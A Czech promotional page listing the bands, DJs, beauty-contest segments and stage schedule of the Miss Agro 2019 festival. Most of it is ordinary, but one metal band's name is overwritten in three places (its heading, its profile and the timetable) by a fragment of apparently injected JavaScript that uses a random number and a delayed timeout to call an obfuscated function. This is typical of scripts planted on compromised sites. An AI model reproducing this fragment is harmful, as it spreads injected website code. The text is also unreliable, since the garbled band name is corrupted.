Program Miss Agro 2019

Co Vás čeká a nemine?

Jako každý rok na Vás mimo volby královny krásy čeká nášup kapel a akce na kterou se jen tak nezapomíná.

Mrkněte co jsme pro Vás letos připravili a sledujte Facebook event!

Miss Agro 2019 vypukne už 14. 5.

No Name

Vrcholem letos budou naši bratia zo Slovenska, bratři Timkovci spolu s dalšími členy kapely – pop-rocková skupina No Name! Držitelé Slavíka vydali od svého založení v roce 1996 celkem 12 alb, na kterých najdete velké hity jako Prva, Čím to je a Nie alebo Áno.

UDG

Ústecká pop-rocková kapela se do paměti lidí zapsala hitem Hvězdář, který nesmí chybět na žádném koncertě. Od roku 1998 vydali celkem 5 alb a 3 DVD. Umístili se v několika hudebních žebříčcích a dodnes tato šestičlenná kapela pravidelně vyprodává koncerty.

Prago Union

Kdo by neznal tuto pražskou hip-hopovou skupinu založenou už v roce 2002. Za společných 17 let vydali celkem 9 alb, byli několikrát nominovaní na hudební ceny Anděl a odehráli nespočetně živých vystoupení. Na jedno takové se i Vy můžete letos těšit!

Vojtaano

Vojtaano, neboli Vojta Záveský, se do povědomí vryl především hity Budulínek vs. Galantní jelen nebo Lavina, která byla napsána pro seriál Vyšehrad. Svou tvorbu označuje jako folk-rap a pyšní se i nominací v Českém slavíkovi v kategorii objev roku 2017.

Lety Mimo

Historie této tříčlenné kapely sahá až do porevolučního období. Kapela, která šest let dělala předskokany Třem sestrám, se vyznačuje mícháním různých hudebních stylů, nicméně jako svůj žánr označují rock-electronica. Za svá léta působení vydali už 12 alb.

Handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Grenade

Handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Grenade je jihočeská metalová kapela, která hraje již od roku 2008. Na svém kontě mají již tři alba a nespočet odehraných koncertů i festivalů. V loňském roce dokonce objeli turné po České republice. Tato čtyřčlenná kapela totiž ví, jak to má na podiu rozbalit!

JEN

JEN, neboli Jan Nedvěd, se na ČZU a na Miss Agro pohybuje už od dob své kapely Bekofis. Zpěvák, skladatel a textař zahraje jak světově známé covery, tak svou vlastní tvorbu. Navíc opět svým zpěvem doprovodí finalistky při záverečném defilé.

Faraday

Vznik tříčlenné Suchdolské kapely hrající hlavně BritRock, sahá až k roku 2011. Pyšní se výhradně vlastní tvorbou a zpěvem pouze v angličtině. Na hlavní stage Miss Agro 2019 si zahrají díky vítězství v letošním ročníku iZUN Music Challenge.

DJ Roxtar

Stejně jako předešlé roky, tak i letos se na Miss Agro ukáže DJ Roxtar. Jeden z TOP DJ’s a producentů československé scény to rozbalí a věřte, že nikdo nezůstane klidně stát. Jeho Dance eXXtravaganzu si totiž užijete na milion procent!

DJ Lowa

Další, kdo Vám zahraje na letošním Miss Agro, je známý producent, moderátor a hlavně DJ, nikdo jiný než DJ Lowa. Kromě československé scény se prosadil v zemích napříč celou Evropou a nic mu není cizí. Věřte, že na tuhle party jen tak nezapomenete

DJ Zeekee

Co by to bylo za party na ČZU bez DJ Zeekee? Všichni ho známe, všichni ho zbožňujeme. Kromě programu na Miss Agro Vás rozhýbe i na afterparty, která se letos uskuteční v Klubu C a kde atmosféra festivalu bude gradovat až do rána.

Volba Miss Agro 2019

Deset krásných finalistek bude v rámci festivalu bojovat o v pořadí již jednadvacátý titul Miss Agro 2019. Dívky se na pódiu představí během dne ve třech vstupech a samozřejmě nebude chybět ani tradiční promenáda v plavkách.

Harmonogram festivalu

MISS AGRO STAGE

14:00 Faraday

15:10 Lety Mimo

16:00 1. část soutěže Miss Agro

17:00 Prago Union

18:00 2. část soutěže Miss Agro

19:00 UDG

20:00 Vyhlášení Miss Agro 2019 + Jan Nedvěd

21:00 No Name

MOBIL.CZ STAGE

14:00 DJ Lowa

15:00 DJ Zeekee

17:00 JEN

18:15 Handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Grenade

19:00 DJ Lowa

20:00 Vojtaano

21:00 DJ Roxtar

Podívejte se kdo letos bude soutěžit o titul Miss Agro 2019?